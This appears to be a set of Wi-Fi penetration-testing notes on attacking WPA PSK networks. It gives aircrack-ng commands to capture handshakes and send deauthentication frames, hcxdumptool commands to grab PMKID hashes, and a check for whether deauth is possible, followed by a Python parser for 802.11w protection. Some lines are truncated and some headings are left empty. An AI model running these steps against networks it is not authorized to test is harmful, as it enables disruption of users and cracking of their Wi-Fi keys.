PSK

Handshake

Start monitoring mode

$ airmon-ng start wlan0

Monitor networks

$ airodump-ng wlan0

Dump target’s traffic

$ airodump-ng -c CHANNEL --bssid BSSID -w ESSID wlan0

Deauth clients

$ aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

  • -0 means deauthentication

  • 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously

  • -a 00:14:6C:7E:40:80 is the MAC address of the access point

  • -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated

  • ath0 is the interface name

PMKID

https://habr.com/ru/companies/jetinfosystems/articles/419383/

Start capturing PMKID hashes for the specified wireless networks:

$ echo HH:HH:HH:HH:HH:HH | sed 's/://g' >> filter.txt
$ hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist

install

grab

loot

check

brute

Check whether deauth is possible

Sniff traffic and find a Beacon Frame: IEEE 802.11 Wireless Management -> Tagged parameters -> Tag: RSN Information -> RSN Capabilities: 0x0028. If Management Frame Protection (802.11w) is not set there, clients can be deauthenticated.
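An added example, not part of the original notes: a small Python decoder for the RSN Information element (tag 48) taken from a beacon, so the same check can be run from your own capture to confirm whether an access point you operate advertises 802.11w Management Frame Protection. It also names the cipher and AKM suites, so a WPA2-PSK network is distinguishable from WPA3-SAE. The sample IE bodies, the helper names and the suite tables are constructed for this example.

```python
# Added example, not part of the original notes: decode the RSN Information
# element body from a beacon frame and report whether the AP advertises
# 802.11w Management Frame Protection. An AP with MFPC/MFPR both clear
# (RSN Capabilities 0x0028, as in the note above) does not protect
# deauthentication frames; one with MFPR set forces every client to use
# protected management frames. All sample data below is constructed.
import struct

OUI_IEEE = b"\x00\x0f\xac"

# Suite selector values for OUI 00-0F-AC (IEEE 802.11-2016, clause 9.4.2.25)
CIPHER_SUITES = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
                 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKM_SUITES = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK",
              5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE"}

# Replay-counter fields are 2-bit codes: 0 -> 1, 1 -> 2, 2 -> 4, 3 -> 16
REPLAY_COUNTERS = {0: 1, 1: 2, 2: 4, 3: 16}


def decode_rsn_capabilities(caps):
    """Split the 16-bit RSN Capabilities field into its named bits."""
    return {
        "preauth": bool(caps & 0x0001),
        "no_pairwise": bool(caps & 0x0002),
        "ptksa_replay_counters": REPLAY_COUNTERS[(caps >> 2) & 0x3],
        "gtksa_replay_counters": REPLAY_COUNTERS[(caps >> 4) & 0x3],
        "mfp_required": bool(caps & 0x0040),  # MFPR, bit 6
        "mfp_capable": bool(caps & 0x0080),   # MFPC, bit 7
    }


def _suite_name(raw, table):
    """Map a 4-byte suite selector to a name; vendor OUIs are shown as hex."""
    if raw[:3] == OUI_IEEE:
        return table.get(raw[3], "00-0F-AC:%d" % raw[3])
    return raw.hex()


def _read_suites(body, off, table):
    """Read a 2-byte count followed by that many 4-byte suite selectors."""
    count = struct.unpack_from("<H", body, off)[0]
    off += 2
    if off + 4 * count > len(body):
        raise ValueError("truncated suite list")
    suites = [_suite_name(body[off + 4 * i:off + 4 * i + 4], table)
              for i in range(count)]
    return suites, off + 4 * count


def parse_rsn_ie(body):
    """Parse the body of an RSN IE (bytes after the tag number and length).

    Trailing fields are optional in the standard; a missing RSN Capabilities
    field is treated as all-zero, i.e. no MFP advertised.
    """
    if len(body) < 6 or struct.unpack_from("<H", body, 0)[0] != 1:
        raise ValueError("not a version-1 RSN IE")
    off = 2
    group = _suite_name(body[off:off + 4], CIPHER_SUITES)
    off += 4
    pairwise, off = _read_suites(body, off, CIPHER_SUITES)
    akm, off = _read_suites(body, off, AKM_SUITES)
    caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0
    return {"group_cipher": group, "pairwise_ciphers": pairwise, "akm": akm,
            "capabilities": caps, **decode_rsn_capabilities(caps)}


def deauth_protection(body):
    """Return 'none', 'optional' or 'required' for the AP's MFP policy."""
    info = parse_rsn_ie(body)
    if info["mfp_required"]:
        return "required"
    return "optional" if info["mfp_capable"] else "none"


# Constructed sample IE bodies (hex strings, whitespace is ignored):
# WPA2-PSK, CCMP, RSN Capabilities 0x0028 -> MFPC=0, MFPR=0
RSN_WPA2_PSK_NO_MFP = bytes.fromhex(
    "0100 000fac04 0100 000fac04 0100 000fac02 2800")
# WPA3-SAE, CCMP, RSN Capabilities 0x00C0 -> MFPC=1, MFPR=1
RSN_WPA3_SAE_MFPR = bytes.fromhex(
    "0100 000fac04 0100 000fac04 0100 000fac08 c000")

if __name__ == "__main__":
    for label, ie in (("WPA2-PSK", RSN_WPA2_PSK_NO_MFP),
                      ("WPA3-SAE", RSN_WPA3_SAE_MFPR)):
        info = parse_rsn_ie(ie)
        print("%s: AKM=%s caps=0x%04x MFP=%s" % (
            label, ",".join(info["akm"]), info["capabilities"],
            deauth_protection(ie)))
```

Note that the beacon only states the AP's policy: a result of "optional" (MFPC set, MFPR clear) still leaves any client that did not negotiate MFP in its association unprotected, so when hardening a network the setting to verify is MFPR.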
